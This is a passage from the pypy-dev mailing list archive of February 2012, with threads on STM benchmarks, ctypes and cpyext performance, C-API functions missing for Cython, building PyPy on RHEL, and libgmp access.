/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > > -- Best regards, Leandro Lameiro Blog: http://lameiro.wordpress.com Twitter: http://twitter.com/lameiro -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From cfbolz at gmx.de Tue Feb 21 17:21:45 2012 From: cfbolz at gmx.de (Carl Friedrich Bolz) Date: Tue, 21 Feb 2012 17:21:45 +0100 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> Message-ID: <4F43C499.5030201@gmx.de> On 02/20/2012 06:50 PM, Alex Gaynor wrote: > Unfortunately this commit has some bad effects. Going through an > iterator in popitem() will result in O(N**2) behavior for repeated > calls. If you look at the r_dict implementation of popitem() you can > see the fix there. This is just the default implementation for the DictStrategy base class. All interesting subclasses override this default. The segfault happened because the dict proxy strategy doesn't override it. So yes, calling A.__dict__.popitem repeatedly for a class A is O(N**2). Do we care? Cheers, Carl Friedrich From alex.gaynor at gmail.com Tue Feb 21 17:25:28 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Tue, 21 Feb 2012 11:25:28 -0500 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: <4F43C499.5030201@gmx.de> References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> <4F43C499.5030201@gmx.de> Message-ID: On Tue, Feb 21, 2012 at 11:21 AM, Carl Friedrich Bolz wrote: > On 02/20/2012 06:50 PM, Alex Gaynor wrote: > > Unfortunately this commit has some bad effects. Going through an > > iterator in popitem() will result in O(N**2) behavior for repeated > > calls. If you look at the r_dict implementation of popitem() you can > > see the fix there. > > This is just the default implementation for the DictStrategy base class. > All interesting subclasses override this default. The segfault happened > because the dict proxy strategy doesn't override it. > > So yes, calling A.__dict__.popitem repeatedly for a class A is O(N**2). Do > we care? 
> > Cheers, > > Carl Friedrich > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > No, anyone doing that deserves what they get ;) Sorry I missed that the subclass overrode it. Alex -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From sebastien.volle at gmail.com Tue Feb 21 19:03:09 2012 From: sebastien.volle at gmail.com (Sébastien Volle) Date: Tue, 21 Feb 2012 12:03:09 -0600 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: <4F423EB6.1020601@gmail.com> References: <4F422902.5030106@gmail.com> <4F423EB6.1020601@gmail.com> Message-ID: Hello, I ran stock pypy 1.8 and latest version of ctypes from mercurial and here are the results with a capture file with around 110,000 ARP packets: Stock pypy 1.8: ----------------------------------------------- elapsed time : 2419.07ms Total packets : 110450 packets/s : 45658.02 pypy 1.8 binary and latest ctypes: ----------------------------------------------- elapsed time : 1410.92ms Total packets : 110450 packets/s : 78282.04 CPython 2.6.5: ------------------------------------------------ elapsed time : 964.23ms Total packets : 110450 packets/s : 114547.49 As you can see, in this situation the performance increase is rather significant. CPython still holds the advantage with a fair margin though. Regards, Sébastien On 20 February 2012 06:38, Antonio Cuni wrote: > On 02/20/2012 12:59 PM, Sébastien Volle wrote: > >> Hello Antonio, >> >> Thank you for the update. I'll try and run a long running capture. Several >> days worth of ARP packets should be enough to maximize JIT effect I >> suppose. >> I'll keep you updated. 
>> > to amortize the JIT warmup cost, it's probably enough to have a benchmark > which runs for few seconds. No clue how many days of ARP packets are needed > for that, though :-). > > ciao, > Anto > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Wed Feb 22 10:19:57 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 22 Feb 2012 10:19:57 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi, Update. I found out that the method cache in typeobject.py is still causing troubles, so I disabled it and get the following results (now more consistently): 1 thread: 1626ms 2 threads: 925ms 3 threads: 647ms 4 threads: 571ms 8 threads: 429ms So now even 3 threads are enough to get parity with a regular no-jit pypy, even though the latter does use the method cache optimization. A bientôt, Armin. From arigo at tunes.org Wed Feb 22 16:57:56 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 22 Feb 2012 16:57:56 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Re-hi, A further update: for fair comparison I built a version of pypy with no stm, -O2, and disabling the method cache too. It takes 820ms per iteration, not 650ms. This places the pure overhead of STM at just under 2x. That's another milestone: I estimated that we would get an overhead between 2x and 5x, and now we're under 2x :-) Well, CPython 2.7 still runs it in 310ms, but that's maybe not important. I guess I will start in the coming days to play with JIT integration. And of course this is all on richards, an ideal benchmark with no transaction conflicts and no I/O. Right now I/O should work correctly, but immediately force the transaction to become inevitable. There can be only one inevitable transaction at any time and no other transaction can commit; this delays the other transactions if they also try to do I/O or try to commit before the inevitable one. A bientôt, Armin. 
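[Editorial note: the inevitable-transaction rule Armin describes can be illustrated with a toy model. This is only a sketch of the commit rule as stated in the email — one inevitable transaction at a time, and no other transaction may commit while it runs — not PyPy's actual STM code; the `ToyScheduler` class and its method names are invented for this illustration.]

```python
class ToyScheduler:
    """Toy model of the commit rule described above (not PyPy's code):
    once a transaction turns inevitable (e.g. because it did I/O), no
    other transaction may do I/O or commit until it finishes."""

    def __init__(self):
        self.inevitable = None  # at most one inevitable transaction

    def start_io(self, tx):
        if self.inevitable is not None and self.inevitable is not tx:
            return False          # must wait: another tx is inevitable
        self.inevitable = tx      # I/O forces this tx to become inevitable
        return True

    def commit(self, tx):
        if self.inevitable is not None and self.inevitable is not tx:
            return False          # delayed behind the inevitable tx
        if self.inevitable is tx:
            self.inevitable = None
        return True

s = ToyScheduler()
assert s.start_io("t1")        # t1 does I/O, becomes inevitable
assert not s.start_io("t2")    # t2's I/O is delayed
assert not s.commit("t2")      # t2 cannot commit yet
assert s.commit("t1")          # t1 commits, releasing the others
assert s.commit("t2")
```

In this model, as in the email, I/O is what forces a transaction to become inevitable, and every other transaction's commit is simply delayed until the inevitable one is done.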
From stefan_ml at behnel.de Wed Feb 22 21:39:03 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 22 Feb 2012 21:39:03 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi, adding to the list. Stefan Behnel, 19.02.2012 12:10: > Some more errors that I see in the logs up to that point, which all hint at > missing bits of the C-API implementation: > > specialfloatvals.c:490: error: ‘Py_HUGE_VAL’ undeclared CPython simply defines this as #ifndef Py_HUGE_VAL #define Py_HUGE_VAL HUGE_VAL #endif to allow users to override it on buggy platforms. > buffmt.c:2589: warning: implicit declaration of function ‘PyUnicode_Replace’ Some more missing parts of the C-API: - PyUnicode_Tailmatch - PyFrozenSet_Type Regarding the PyUnicode_*() functions, I could disable their usage when compiling against PyPy. Would that be helpful? I wouldn't expect them to be hard to implement, though. And disabling means that we'd have to remember to re-enable them when they become available at some point ... Does PyPy's cpyext define a version that we could base that decision on? Stefan From stefan_ml at behnel.de Wed Feb 22 23:28:35 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 22 Feb 2012 23:28:35 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 22.02.2012 21:39: > adding to the list. > >> Some more errors that I see in the logs up to that point, which all hint at >> missing bits of the C-API implementation: >> >> specialfloatvals.c:490: error: ‘Py_HUGE_VAL’ undeclared > > CPython simply defines this as > > #ifndef Py_HUGE_VAL > #define Py_HUGE_VAL HUGE_VAL > #endif > > to allow users to override it on buggy platforms. > >> buffmt.c:2589: warning: implicit declaration of function ‘PyUnicode_Replace’ 
> > Some more missing parts of the C-API: > > - PyUnicode_Tailmatch > > - PyFrozenSet_Type - PyUnicode_GetMax - the Unicode character type functions: Py_UNICODE_ISTITLE(), Py_UNICODE_ISALPHA(), Py_UNICODE_ISDIGIT(), Py_UNICODE_ISNUMERIC() Our exec/eval implementation is broken because these are missing: PyCode_Check(), PyCode_GetNumFree(), PyEval_EvalCode(), PyEval_MergeCompilerFlags(), PyCF_SOURCE_IS_UTF8, PyRun_StringFlags() I doubt that they will be all that trivial to implement, so I can live with not having them for a while. Code that uses exec/eval will just fail to compile for now. I had to disable the following tests from Cython's test suite because they either crash PyPy or at least corrupt it in a way that infects subsequent tests: bufaccess cascadedassignment control_flow_except_T725 exarkun exceptions_nogil extended_unpacking_T235 fused_def fused_cpdef literal_lists memoryview moduletryexcept purecdef property_decorator_T593 setjmp special_methods_T561_py2 tupleassign tryexcept tuple_unpack_string type_slots_nonzero_bool With those taken out, I get an otherwise complete test run: https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/23/ Here are the test results: https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/23/testReport/ It obviously runs longer than a CPython run (22 vs. 7 minutes), even though the runtime is normally dominated by the C compiler runs. However, having learned a bit about the difficulties that PyPy has in emulating the C-API, I'm actually quite impressed how much of this just works at all. Well done. And last but not least, over on python-dev, MvL proposed these two simple functions for accessing the tstate->exc_* fields: - PyErr_GetExcInfo(PyObject** type, PyObject** value, PyObject** tb) - PyErr_SetExcInfo(PyObject* type, PyObject* value, PyObject* tb) http://thread.gmane.org/gmane.comp.python.devel/129787/focus=129792 Makes sense to me. 
Getting those in would fix our generator/coroutine implementation, amongst other things. Stefan From dhubler at uw.edu Thu Feb 23 00:32:12 2012 From: dhubler at uw.edu (Dale Hubler) Date: Wed, 22 Feb 2012 15:32:12 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <1329840965.15787.29.camel@surprise> References: <4F3991C8.5040305@u.washington.edu> <1329840965.15787.29.camel@surprise> Message-ID: <4F457AFC.3070904@uw.edu> Hi to all who answered me and thanks for the good assistance. I gave up on the binary distribution right off, and tried to build it from source on RHEL5. I had the most difficulty with the libffi part, I tried a server located directory, /usr/local, and finally /usr as my libffi installdir, but gave up finally with the key error being the ffi include file not being located. RHEL6 has this libffi library readily available to our installs, I may pursue an install from the source on RHEL6 instead, once I go over the pre-reqs. It worked fine with the existing SSL libraries as others posted, I did not need 0.9.8 at all. The absolute most help are the RPM's built by David Malcolm at EPEL, thanks so much for those. They installed well and I will place them in our satellite server for subsequent kickstarts. Our researchers have had a nice speedup with their python and are very eager to try it. So my next problem is that the users upped their request. They did not tell me they wanted particular modules also, such as numpy. I saw reference to numpypy and will look into that, I've not read any docs on installing pypy modules yet. I'm familiar with installing python modules already. I do have a question along those lines. We have a fileserver located python 2.7.2 and we install python modules into that location. When I am building pypy from the source I have been using that version of python. 
If I use that python and am successful at building pypy will users of my pypy have access to the python modules in that python install, or rather do I need to independently install all the modules pypy users want into the pypy filetree? i.e., Does pypy use the available python modules on the host, or does it need its own? thanks to all again, Dale On 02/21/2012 08:16 AM, David Malcolm wrote: > > FWIW, I've built PyPy 1.8 in RPM form for RHEL 5 and 6, within the > "EPEL" community repositories: http://fedoraproject.org/wiki/EPEL > > So if you've configured the EPEL repos, you can install pypy via: > > # yum install pypy > > and not have to do the translation yourself. > > Note that this is a side-project by me, not an "official" Red > Hat-supported thing. > > The EPEL 5 builds of pypy 1.8 can be seen here: > https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0276 > > The EPEL 6 builds of pypy 1.8 can be seen here: > https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0275 > > Hope this is helpful > Dave > -- -- Dale Hubler dhubler at uw.edu (206) 685-4035 Senior Computer Specialist University of Washington Genome Sciences Dept. From anto.cuni at gmail.com Thu Feb 23 09:22:25 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Thu, 23 Feb 2012 09:22:25 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F422902.5030106@gmail.com> <4F423EB6.1020601@gmail.com> Message-ID: <4F45F741.8000607@gmail.com> Hello Sébastien, thank you for sharing these numbers. I'm glad to see that my checkin worked so well :-) Indeed, CPython is still quite faster: it might be the case that ~1.5 seconds is still not enough for the jit to fully warm up (especially if there are a lot of hot branches), or simply that you are encountering another case in which we do bad. I don't think I'll have time to investigate further in the next few days, though, but I might do it next week. 
ciao, Anto On 02/21/2012 07:03 PM, Sébastien Volle wrote: > Hello, > > I ran stock pypy 1.8 and latest version of ctypes from mercurial and here are > the results with a capture file with around 110,000 ARP packets: > > Stock pypy 1.8: > ----------------------------------------------- > elapsed time : 2419.07ms > Total packets : 110450 > packets/s : 45658.02 > > > pypy 1.8 binary and latest ctypes: > ----------------------------------------------- > elapsed time : 1410.92ms > Total packets : 110450 > packets/s : 78282.04 > > > CPython 2.6.5: > ------------------------------------------------ > elapsed time : 964.23ms > Total packets : 110450 > packets/s : 114547.49 > > As you can see, in this situation the performance increase is rather > significant. CPython still holds the advantage with a fair margin though. > > Regards, > Sébastien > > > On 20 February 2012 06:38, Antonio Cuni > wrote: > > On 02/20/2012 12:59 PM, Sébastien Volle wrote: > > Hello Antonio, > > Thank you for the update. I'll try and run a long running capture. Several > days worth of ARP packets should be enough to maximize JIT effect I > suppose. > I'll keep you updated. > > > to amortize the JIT warmup cost, it's probably enough to have a benchmark > which runs for few seconds. No clue how many days of ARP packets are > needed for that, though :-). > > ciao, > Anto > > From arigo at tunes.org Thu Feb 23 10:26:01 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 23 Feb 2012 10:26:01 +0100 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F457AFC.3070904@uw.edu> References: <4F3991C8.5040305@u.washington.edu> <1329840965.15787.29.camel@surprise> <4F457AFC.3070904@uw.edu> Message-ID: Hi, Maybe we should write down some answers to these questions in a single place... On Thu, Feb 23, 2012 at 00:32, Dale Hubler wrote: > They did not tell me they wanted particular modules also, such as numpy. 
'numpypy' is already included in a baseline PyPy but is only a partial implementation of numpy so far. > I do have a question along those lines. We have a fileserver located > python 2.7.2 and we install python modules into that location. When I am > building pypy from the source I have been using that version of python. What we or you used to translate pypy (cpython 2.5-2.7 or pypy itself) has no effect on the result. You need to install everything for pypy independently, just like you need to install everything independently for various versions of CPython. The module installation is very similar to CPython's. It should mostly just work if you use PyPy instead of CPython to run the installer, e.g. "pypy setup.py install". If the module contains a C extension, it may or may not work out of the box. A bientôt, Armin. From anto.cuni at gmail.com Thu Feb 23 12:01:57 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Thu, 23 Feb 2012 12:01:57 +0100 Subject: [pypy-dev] [pypy-commit] pypy sepcomp2: Functions can be @exported without specifying argument types, In-Reply-To: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> References: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> Message-ID: <4F461CA5.2020703@gmail.com> Hi Amaury, On 02/22/2012 12:34 AM, amauryfa wrote: > Author: Amaury Forgeot d'Arc > Branch: sepcomp2 > Changeset: r52748:ce2d7e8a1b42 > Date: 2012-02-21 23:28 +0100 > http://bitbucket.org/pypy/pypy/changeset/ce2d7e8a1b42/ > + def test_implied_signature(self): > + @export # No explicit signature here. > + def f(x): > + return x + 1.5 > + @export() # This is an explicit signature, with no argument. > + def f2(): > + f(1.0) what about using @export(implicit=True) or something like that? Else @export and @export() are too easy to confound, IMHO. 
ciao,
Anto

From amauryfa at gmail.com Thu Feb 23 13:54:06 2012
From: amauryfa at gmail.com (Amaury Forgeot d'Arc)
Date: Thu, 23 Feb 2012 13:54:06 +0100
Subject: [pypy-dev] [pypy-commit] pypy sepcomp2: Functions can be @exported without specifying argument types,
In-Reply-To: <4F461CA5.2020703@gmail.com>
References: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> <4F461CA5.2020703@gmail.com>
Message-ID: 

2012/2/23 Antonio Cuni
> Hi Amaury,
>
> On 02/22/2012 12:34 AM, amauryfa wrote:
>> Author: Amaury Forgeot d'Arc
>> Branch: sepcomp2
>> Changeset: r52748:ce2d7e8a1b42
>> Date: 2012-02-21 23:28 +0100
>> http://bitbucket.org/pypy/pypy/changeset/ce2d7e8a1b42/
>
>> +    def test_implied_signature(self):
>> +        @export  # No explicit signature here.
>> +        def f(x):
>> +            return x + 1.5
>> +        @export()  # This is an explicit signature, with no argument.
>> +        def f2():
>> +            f(1.0)
>
> what about using @export(implicit=True) or something like that? Else
> @export and @export() are too easy to confuse, IMHO.

That's right. I'll change it to @export_auto, unless someone has a better name.

-- 
Amaury Forgeot d'Arc
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From nam.nguyen at lolapps.com Thu Feb 23 21:53:02 2012
From: nam.nguyen at lolapps.com (Nam Nguyen)
Date: Thu, 23 Feb 2012 12:53:02 -0800
Subject: [pypy-dev] Invitation to San Francisco Python meetup
Message-ID: 

Hi all,

I'm helping the SF Python meetup group organize a pre-PyCon meetup in that
same week. I am also soliciting half-hour talks from PyPy developers.

So if you happen to be in San Francisco or the surrounding area, would you
attend the meetup and/or give us a talk?

I noticed some core PyPy developers would also be attending PyCon 2012.
We'd be glad to have you present your talks at the meetup too. That would
be very helpful to many people who could not attend your sessions.

Cheers,
Nam
PS: I personally long for some sharing on STM.
From fijall at gmail.com Thu Feb 23 22:19:26 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Thu, 23 Feb 2012 14:19:26 -0700
Subject: [pypy-dev] Invitation to San Francisco Python meetup
In-Reply-To: 
References: 
Message-ID: 

On Thu, Feb 23, 2012 at 1:53 PM, Nam Nguyen wrote:
> Hi all,
>
> I'm helping out the SF Python meetup group organize a pre-PyCon meetup
> in that same week. I am also soliciting half-hour talks from PyPy
> developers.
>
> So if you happened to stay in San Francisco and the surrounding area,
> would you attend the meetup and/or give us a talk?
>
> I noticed some core PyPy developers would also be attending PyCon
> 2012. We'd be glad to have you present your talks at the meetup too.
> That would be very helpful to many people who could not attend your
> sessions.
>
> Cheers,
> Nam
> PS: I personally long for some sharing on STM.
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev

Hi

I'm in the area from the coming Friday, so I'm good to give a talk any
time next week as well. Armin is arriving later and might be more
jetlagged :)

Cheers,
fijal

From tbaldridge at gmail.com Fri Feb 24 02:56:12 2012
From: tbaldridge at gmail.com (Timothy Baldridge)
Date: Thu, 23 Feb 2012 19:56:12 -0600
Subject: [pypy-dev] libgmp
Message-ID: 

For a project I'm working on, I'd like to have support for gmp in pypy.
I have a ctypes pypy module, but from what I understand, pypy's ctypes
are a bit slow compared to CPython. What's the best way to get access to
libgmp from python? Would you be against a pull request that added
libgmp as an RPython module?

Thanks

Timothy

-- 
"One of the main causes of the fall of the Roman Empire was that--lacking
zero--they had no way to indicate successful termination of their C
programs."
(Robert Firth)

From william.leslie.ttg at gmail.com Fri Feb 24 03:06:24 2012
From: william.leslie.ttg at gmail.com (William ML Leslie)
Date: Fri, 24 Feb 2012 13:06:24 +1100
Subject: [pypy-dev] libgmp
In-Reply-To: 
References: 
Message-ID: 

On 24 February 2012 13:05, William ML Leslie wrote:
> On 24 February 2012 12:56, Timothy Baldridge wrote:
>> For a project I'm working on, I'd like to have support for gmp in
>> pypy. I have a ctypes pypy module, but from what I understand, pypy's
>> ctypes are a bit slow compared to CPython.
>
> On the contrary, ctypes is particularly fast on pypy for common usage.
> Does your benchmark get to the point of JITting it?

Sorry, forgot to reply-all.

-- 
William Leslie

From fijall at gmail.com Fri Feb 24 03:18:36 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Thu, 23 Feb 2012 19:18:36 -0700
Subject: [pypy-dev] libgmp
In-Reply-To: 
References: 
Message-ID: 

On Thu, Feb 23, 2012 at 6:56 PM, Timothy Baldridge wrote:
> For a project I'm working on, I'd like to have support for gmp in
> pypy. I have a ctypes pypy module, but from what I understand, pypy's
> ctypes are a bit slow compared to CPython. What's the best way to get
> access to libgmp from python? Would you be against a pull request that
> added libgmp as an RPython module?
>
> Thanks
>
> Timothy

Hi

PyPy's ctypes story is a kind of sad one. There was an attempt to make it
fast, but it's definitely unfinished. If you hit the correct sweet spot of
ctypes, it's super-fast, much faster than cpython. If you however don't,
it's slow. Maybe you can show a concrete usecase and I can try and speed
it up?

I suppose ctypes is the advertised way of accessing C from PyPy for now.
Cheers,
fijal

From fijall at gmail.com Fri Feb 24 03:24:44 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Thu, 23 Feb 2012 19:24:44 -0700
Subject: [pypy-dev] libgmp
In-Reply-To: 
References: 
Message-ID: 

On Thu, Feb 23, 2012 at 7:06 PM, William ML Leslie wrote:
> On 24 February 2012 13:05, William ML Leslie wrote:
>> On 24 February 2012 12:56, Timothy Baldridge wrote:
>>> For a project I'm working on, I'd like to have support for gmp in
>>> pypy. I have a ctypes pypy module, but from what I understand, pypy's
>>> ctypes are a bit slow compared to CPython.
>>
>> On the contrary, ctypes is particularly fast on pypy for common usage.
>> Does your benchmark get to the point of JITting it?
>
> Sorry, forgot to reply-all.

That's not entirely true. You can debate what "common usage" means, but I
had issues hitting the sweet spot.

From stefan_ml at behnel.de Fri Feb 24 09:17:13 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Fri, 24 Feb 2012 09:17:13 +0100
Subject: [pypy-dev] libgmp
In-Reply-To: 
References: 
Message-ID: 

Maciej Fijalkowski, 24.02.2012 03:18:
> On Thu, Feb 23, 2012 at 6:56 PM, Timothy Baldridge wrote:
>> For a project I'm working on, I'd like to have support for gmp in
>> pypy. I have a ctypes pypy module, but from what I understand, pypy's
>> ctypes are a bit slow compared to CPython. What's the best way to get
>> access to libgmp from python? Would you be against a pull request that
>> added libgmp as an RPython module?
>
> PyPy's ctypes story is a kind of sad one. There was an attempt to make
> it fast, but it's definitely unfinished. If you hit the correct sweet
> spot of ctypes, it's super-fast, much faster than cpython. If you
> however don't, it's slow. Maybe you can show a concrete usecase and I
> can try and speed it up?

Yep, benchmarking the obvious solution instead of stepping right into the
optimisation is *always* a good idea.

> I suppose ctypes is the advertised way of accessing C from PyPy for now.
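[Editorial aside: for reference, the ctypes pattern under discussion, declaring `argtypes` and `restype` up front so that each call is a plain, predictable C call, looks roughly like this. A generic sketch using libm as a stand-in for libgmp; this is not Timothy's actual module:]

```python
import ctypes
import ctypes.util

# Load the C math library as a stand-in for libgmp.
libm = ctypes.CDLL(ctypes.util.find_library("m"))

# Declaring the signature explicitly is required for correctness
# (double arguments would be mangled otherwise), and it is also
# the kind of call that PyPy's ctypes can compile down to a
# direct C call when the fast path applies.
libm.sqrt.argtypes = [ctypes.c_double]
libm.sqrt.restype = ctypes.c_double

def hypot(a, b):
    # One plain C call per invocation; no Python-level math.
    return libm.sqrt(a * a + b * b)

print(hypot(3.0, 4.0))  # 5.0
```

Whether such calls hit the fast path on a given PyPy build is exactly the open question in this thread, hence fijal's request for a concrete use case.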
Sorry for bringing up this topic again, but I know that loads of people in the Cython community are rather happy users of gmp. Sage contains quite a bit of gmp code, for example, and random people keep mentioning their own usage of it on the cython-users mailing list quite frequently. At least, there should be some code around to build on. So, as a reply to the OP: seeing the current advances in getting Cython code to run in PyPy (interfacing at the C-API level), another option would be to do exactly as you would in CPython and implement the performance critical parts of the code that heavily rely on gmp interaction in Cython (to get plain C code out of it), and then import and use that from PyPy, but at a much higher level than with direct individual calls to the gmp functions. However much faster ctypes can be in PyPy than in CPython, you just can't beat the performance of a straight block of C code when the goal is to talk to C code. Cython will also allow you to run code in parallel with OpenMP, in case you need that. Depending on your needs, that approach could reduce the amount of interfacing to a minimum, thus equally reducing the chance of running into performance problems with ctypes. PyPy support for Cython is not released yet and still hasn't left the alpha quality stage. However, if it works, it works. You can find it here: https://github.com/scoder/cython And you will most likely also need a nightly build of PyPy. Stefan From arigo at tunes.org Fri Feb 24 09:48:02 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 24 Feb 2012 09:48:02 +0100 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: Hi Stefan, On Fri, Feb 24, 2012 at 09:17, Stefan Behnel wrote: > However much faster ctypes can be in PyPy than in CPython, you > just can't beat the performance of a straight block of C code when the goal > is to talk to C code. That's wrong from a pypy point of view --- or at least not helpful. 
Right now, if your stars are correctly aligned and all the ctypes calls use
the fast path, then pypy generates a block of assembler containing the
direct calls to C code. While not strictly the same performance as a good
optimizing compiler, the difference should not be measurable in this case.

Not to mention that Cython code linked as a cpyext module for pypy is going
to interface very slowly with the rest of pypy. If you need to exchange the
gmp values between Python and the gmp library, then Cython loses on pypy.

(Stefan, it seems like you are regularly using the pypy list to promote
Cython. While I have nothing against Cython, your knowledge about pypy
appears to be superficial. So may I please ask you to stop? Thank you.)

A bientôt,

Armin.

From amauryfa at gmail.com Fri Feb 24 10:27:30 2012
From: amauryfa at gmail.com (Amaury Forgeot d'Arc)
Date: Fri, 24 Feb 2012 10:27:30 +0100
Subject: [pypy-dev] libgmp
In-Reply-To: 
References: 
Message-ID: 

Hi Stefan,

2012/2/24 Stefan Behnel
> So, as a reply to the OP: seeing the current advances in getting Cython
> code to run in PyPy (interfacing at the C-API level), another option would
> be to do exactly as you would in CPython and implement the performance
> critical parts of the code that heavily rely on gmp interaction in Cython
> (to get plain C code out of it), and then import and use that from PyPy,
> but at a much higher level than with direct individual calls to the gmp
> functions. However much faster ctypes can be in PyPy than in CPython, you
> just can't beat the performance of a straight block of C code when the goal
> is to talk to C code. Cython will also allow you to run code in parallel
> with OpenMP, in case you need that.

Cython won't be fast with PyPy. The C code it generates is too much
specialized for CPython.
For example, I've seen huge slowdowns in the Cython program itself (while
compiling lxml, for example) when the various Cython extension modules
(Nodes.c for example) started to compile and became available for pypy.

I was about to write the list of operations that cpyext performs for
PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-)

And PyDict_Next is a nightmare:
https://bitbucket.org/pypy/pypy/src/9f0e8a37712b/pypy/module/cpyext/dictobject.py#cl-177

It's one thing to be able to run lxml and other Cython-based libraries with
pypy. It's another thing to pretend that Cython is the way to write fast
modules on pypy. You may win on the generated C code, but will lose when
interfacing with the rest of the Python interpreter (which is also the
reason why ctypes is so slow).

This said, I've added all the functions you mentioned in a previous email.
You may try your tests again with the nightly build.

-- 
Amaury Forgeot d'Arc
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From stefan_ml at behnel.de Fri Feb 24 11:32:07 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Fri, 24 Feb 2012 11:32:07 +0100
Subject: [pypy-dev] Cython and cpyext performance (was: Re: libgmp)
In-Reply-To: 
References: 
Message-ID: 

Hi Amaury,

Amaury Forgeot d'Arc, 24.02.2012 10:27:
> 2012/2/24 Stefan Behnel
>> So, as a reply to the OP: seeing the current advances in getting Cython
>> code to run in PyPy (interfacing at the C-API level), another option would
>> be to do exactly as you would in CPython and implement the performance
>> critical parts of the code that heavily rely on gmp interaction in Cython
>> (to get plain C code out of it), and then import and use that from PyPy,
>> but at a much higher level than with direct individual calls to the gmp
>> functions. However much faster ctypes can be in PyPy than in CPython, you
>> just can't beat the performance of a straight block of C code when the goal
>> is to talk to C code.
Cython will also allow you to run code in parallel >> with OpenMP, in case you need that. > > Cython won't be fast with PyPy. The C code it generates is too much > specialized for CPython. Well, you have to distinguish between the C code it generates and the C-API calls that it generates to emulate Python semantics. The C code itself isn't impacted by PyPy. There are quite a lot of people who use Cython because it gives them plain C with a friendly syntax and Python features when they need them (e.g. for exceptions). > For example, I've seen huge slowdowns in the Cython program itself (while > compiling lxml, for example) > when the various Cython extension modules (Nodes.c for example) started to > compile and became available for pypy. Right, Cython shouldn't compile itself when running in PyPy, that makes no sense at all. Note that there's a --no-cython-compile option that you can pass to setup.py. It's Python, compilation is completely optional. I'll disable it when installing in PyPy. BTW, from what I've seen so far, the compile times tend to be faster in CPython than in PyPy because even compiling something as large as lxml doesn't seem to run long enough to take much advantage of the JIT. But compiling down to cpyext and going through that is just wrong in any way. > I was about to write the list of operations that cpyext performs for > PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-) Interesting. Is there a better way of doing this? CPython doesn't seem to provide a way to ask for owned references, even though Cython will quite often (but not always) call Py_INCREF() on the result anyway. Would the tuple parsing functions help, for example? There may well be cases where we could use those. Wouldn't be the first time I rewrite the function argument handling code, for example. ;-) > And PyDict_Next is a nightmare: > https://bitbucket.org/pypy/pypy/src/9f0e8a37712b/pypy/module/cpyext/dictobject.py#cl-177 Right, very good example. 
Looks like O(n^2), which is clearly horrible for this.

Actually, even in CPython PyDict_Next() is only about 30% faster than going
through the "lookup and call .iteritems() for dict, loop over the iterator"
dance. I found that rather disappointing.

I had always wanted to make this optimisation optional in the C code so
that we can apply it optimistically at runtime to any unknown object that
someone calls an ".iteritems()" method on. When I get around to finishing
that up (AFAIR, I once had a half-baked patch for it), we can just as well
disable it for PyPy at C compile time and always take the normal iterator
path there. Looks like that would help a lot.

> It's one thing to be able to run lxml and other Cython-based libraries
> with pypy.
> It's another thing to pretend that Cython is the way to write fast
> modules on pypy.

It's *one* way. I'm very well aware that it depends on the ratio of C-level
code and Python-level code - we see that all the time, also in CPython.

> You may win on the generated C code, but will lose when interfacing with
> the rest of the Python interpreter (which is also the reason why ctypes
> is so slow).

Absolutely. I think that's where most of the heated misunderstandings on
both sides come from. On the Cython side, the goal is to drop your code
into C to make it predictably fast. On the PyPy side, the goal is to move
it into Python to let the JIT do its work (and look for ways to improve the
